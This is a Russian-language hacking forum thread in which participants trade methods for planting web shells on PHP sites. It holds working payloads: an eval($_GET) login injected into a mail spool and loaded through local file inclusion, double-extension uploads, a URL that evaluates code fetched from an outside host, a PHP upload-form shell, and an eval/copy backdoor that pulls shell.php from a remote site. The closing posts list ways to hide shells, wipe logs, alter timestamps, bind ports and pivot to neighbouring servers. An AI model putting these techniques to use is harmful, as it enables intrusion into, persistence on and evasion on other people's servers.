С одной стороны, зная возраст ТС, как-то не хочется критиковать. Ведь это еще "начала", и на данном этапе у ТС ярко выражен энтузиазм и желание открыть что-то новое как для себя, так и для других. Но с другой стороны меня всегда поражают люди (причем не с хорошей стороны), которые выходят танцевать на сцену, дабы показать зрителям их мастерство после недели-двух тренировок. Думаю мысль моя ясна и понятна. Я посмею дополнить топик еще одним способом, о котором знаю, а именно заливка шелла через обычное мыльное письмецо. Делается просто. Например у нас есть какая-нить CMS-ка или даже просто самописный двиг, в котором где-то, куда-то иногда отправляются письма. Например, с активацией регистрации и так далее. Дело в том, что такие письма могут быть локально сохранены на nix-системах. Если рассматривать как пример форму активации аккаунта, то введем, например, как логин eval($_GET['c']); а как свое мыло впишем apache@localhost. Таким образом письмо будет отправлено на тот же демон хттпд и сохранено где-то в /var/mail с именем юзера хттпд. Думаю далее действия очевидны, имея, например, локальный инклуд мы можем прогрузить шелл инклудя письмецо с передачей кода загрузки шелла в параметре $_GET['c'].
"Мини-шелл", - убило нах Вообще, ТС, твой "мини-шелл" правильно называть бэк-дором. И это есть стандартные методы заливки. Если бы обьяснил как сделать инклуд бэк-дора в index.php к примеру, то статья заслужила бы название "не стандартные..."
Это все конечно хорошо, но обсуждалось уже 100500 раз, смотреть нужно по ситуации, что там есть чтобы залиться, не только же через админки льют. И про phpmyadmin тоже обсуждалось, и видео такое же снимали... Дополнение тебе: При неправильной конфигурации сервера если залить на сервер что то типа такого asdf.php.asdf, то есть вероятность что выполниться php. Потому как сервер будет сначала искать расширение asdf и после того как не найдет выполнит php. (могу конечно ошибаться с описанием, но такой способ у меня срабатывал несколько раз как на nix так и на windows серверах).
За способ спасибо, обязательно добавлю. А на счёт опыта в погорячились.. спросите хоть у WinsTrooll'a , и он вам ответит, что работаем уже не первый год Такой вид шелла/бек-дора не раз назывался на хакслэнге мини-шеллом, так что споров тут быть не должно, кролик. Не замечал, чтобы это уж прямо ВСЁ обсуждалось 100500 раз, ведь когда-то сам искал, и найти не мог. А что касается "asdf.php.asd" - то это и есть самый банальный способ залития шелла, и все о нём знают.
Доп: 1.Вообще можно заевалить WSO без его физической загрузки на сервер. Для этого убираем <?php ?> Остальное заевалим таким способом: http://site.ru/backdoor.php?cmd=eval(file_get_contents('http://url/ws.txt')); 2. Загрузка прямо из компьютера, евалим это: PHP: echo "<form enctype='multipart/form-data' action='' method='post'> <input type='hidden' name='MAX_FILE_SIZE' value="30000000" /> Shell:<input name='uploadfile' type='file' /> <input type='submit' value='Upload' /> </form>"; if(!empty($HTTP_POST_FILES['uploadfile']['name'])) { @copy($HTTP_POST_FILES['uploadfile']['tmp_name'], './'.$HTTP_POST_FILES['uploadfile']['name']) ? print 'File '.$HTTP_POST_FILES['uploadfile']['name']. ' uploaded!<br/>' : print 'Try...<br/>'"; } .
СПС тебе тс, критиковать все могут, а сами не то что статью, тупо помочь в чем то обламываются и ответить на вопросы новичков бояться, что если новичек узнает и начнет шарить в чем то то все их бизу конец
"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится? Как было написано в статье, то почти всегда нельзя использовать кавычки, и поэтому я и использовать chr(); И без физ.загрузки это уже не "шелл на сервере", да и зачем такая сложная форма загрузки на сервер? в моей статье всё расписано, как проще сделать. P.S И вообще, дорогие РОА, МОА, сами посмотрите, что кроме вас, которые это уже знают, есть очень много людей, которым это нужно.
::facepalm:: Открой для себя функции php. Начни со stripslashes(). Да фиг с ними с функциями, тайна: данные с реквеста php и так принимает строковыми, а если бы он делал по другому случилось бы страшное безобразие, поверь мне. (только никому!!) Я бы на месте модератора РОА взял туда ТСа, что бы его посты не индексировались гуглом )
а смысл??? Они же все знают и ток писать что это паблик инфа могут, тс это писал для тех кто плохо в этом шарит и кому это будет нужно, а им как раз это вроде как и нах не надо Ну а так в целом я думаю тс шарит нормально и он думаю был бы не против
Согласен, тип string можно к примеру сделать так $a = (bla); , но ведь нельзя тогда использовать пробелы, спец.символы. что касается stripslashes() то какая разница, если пхп тупо выдаёт ошибку, если даже \' ?? А насчёт ::facepalm::, eval(eval) - на мой взгляд полный бред
ev=copy($_REQUEST[aa], $_REQUEST[bb]);&aa=http://site.ru/shell.php&bb=./shell.php PHP: <?php eval(stripslashes($_REQUEST[ev])); ?> А это тебе домашнее задание )
ТС, скажи мне лучше как ты прячешь шеллы на сервере. Мне не для того, чтобы узнать, а просто интересно, что ты знаешь в данной области.
1.) Беспалевное имя 2.) Запрячу в самом дальнем каталоге, где много фалов. 3.) Почищу логи 4.) Изменю дату создания файла 5.) Заодно делаю бинд порт, если удалят, он часто остаётся. 6.) Да и много ещё чего придумать можно. Также сначала рутаю, затем кидаю на соседние сервера, чтобы потом с них пробиться можно было, на соседах также выполняю пункты выше. P.S А ты?
